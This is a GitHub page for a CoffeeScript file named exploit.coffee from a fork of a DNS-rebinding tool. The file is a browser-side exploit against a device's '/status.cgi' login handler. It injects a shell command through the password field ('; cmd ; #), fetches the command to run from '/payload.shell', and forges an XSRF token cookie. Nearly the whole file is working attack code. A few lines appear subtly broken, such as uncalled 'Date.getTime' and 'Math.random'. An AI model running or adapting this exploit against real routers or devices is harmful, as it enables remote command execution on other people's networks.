forked from taviso/rbndr
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.coffee
76 lines (66 loc) · 1.7 KB
/
exploit.coffee
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
ajax = (url, params, hdrs) ->
try
req = new XMLHttpRequest
qs = new URLSearchParams
if params
`for (const [key, val] of Object.entries(params)) {
qs.append(key, val);
}`
url += "?#{qs.toString()}"
req.open 'GET', url, 0
req.setRequestHeader 'X-Requested-With', 'XMLHttpRequest'
req.setRequestHeader 'Content-type', 'application/x-www-form-urlencoded'
if hdrs
`for (const [key, val] of Object.entries(hdrs)) {
req.setRequestHeader(key, val);
}`
req.send()
if req.status == 200
req.responseText
else
null
catch
null
random_string = (len) ->
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
digits = '0123456789'
letters = ascii_letters + digits
result = ''
for i in [0...len]
result += letters.charAt Math.random() * letters.length
return result
exploit = (cmd, token) ->
params = {
'_': "#{Math.round (new Date).getTime() / 1000}pytester#{random_string 12}",
'sessionKey': 'NULL',
'cmd': '3',
'nvget': 'login_confirm',
'username': random_string(4),
'password': "'; #{cmd} ; #"
}
hdrs = {
'X-XSRF-TOKEN': token,
'DNT': '1',
'Cookie': document.cookie
}
ajax '/status.cgi', params, hdrs
isthisyou = ->
ajax '/status.cgi', {
'_': "#{Math.round Date.getTime / 1000}pytester#{random_string 12}"
}
class @Payload
set = ->
this.code = ajax '/payload.shell' if !isthisyou()
return
hasnot = ->
!this.code?
get = ->
this.code
mp = new Payload
mp.set() while mp.hasnot()
token = Math.round Math.random * 100000000000
document.cookie = "XSRF-TOKEN=#{token}"
while true
if isthisyou()
exploit mp.get(), token
break